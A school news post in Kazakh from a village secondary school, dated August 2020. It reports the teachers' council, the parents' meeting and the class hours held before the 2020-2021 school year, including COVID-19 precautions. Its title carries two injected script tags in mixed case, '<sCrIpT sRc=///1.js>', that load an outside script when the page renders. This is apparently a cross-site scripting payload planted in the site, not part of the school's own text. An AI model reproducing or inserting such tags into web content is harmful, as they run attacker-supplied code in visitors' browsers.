Жаңа оқу жылының алғашқы іс-шаралары<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

22.08.2020

     Ғ.Әбдірахманұлы атындағы Қима орта мектебінде жаңа оқу жылы қарсаңында 19-тамыз күні – педагогикалық кеңес, 20-тамыз күні – бірыңғай ата-аналар жиналысы, 21-тамыз күні  - бірыңғай сынып сағаттары уақытылы өткізіліп, өз мақсатына жетті. Ұстаздар, оқушылар, ата-аналар қауымдастығы ортаға бүгінгі күннің мәселелерді талқыға салып, ортақ пікірге келісті.           

       Осылайша, ата-аналар жиналысында сынып жетекшілері тарапынан 2020-2021 оқу жылы оқушылар қалай білім алатындары жайлы толық ақпарат беріп, короновирус ауруының алдын алу шараларын естеріне сала кетті.           

    Сынып сағаттарының мақсаты: коронавирустық инфекцияның таралуына жол бермеуге байланысты карантиндік шаралар жағдайында жаңа 2020-2021 оқу жылындағы оқу ерекшеліктері туралы оқушыларды ақпараттандыру.  

    Ата-аналар мен оқушылар елімізде болып жатқан жағдайға байланысты мектепті қолдап, қай қырынан болса да, қол ұшын беруге дайын екендерін айтты.

     Баршаларыңызды жаңа оқу жылының басталуымен құттықтай отыра, еліміз аман, Отанымыз тыныш болсын демекпіз! Мектебіміздің әрбір отбасына тыныштық, зор денсаулық, оқуда табыс пен шығармашылық тілейміз!!!

  

Омарова А.Б.

Просмотров: 585


Пікір қосу



Деректерді қолтаңбаға қосу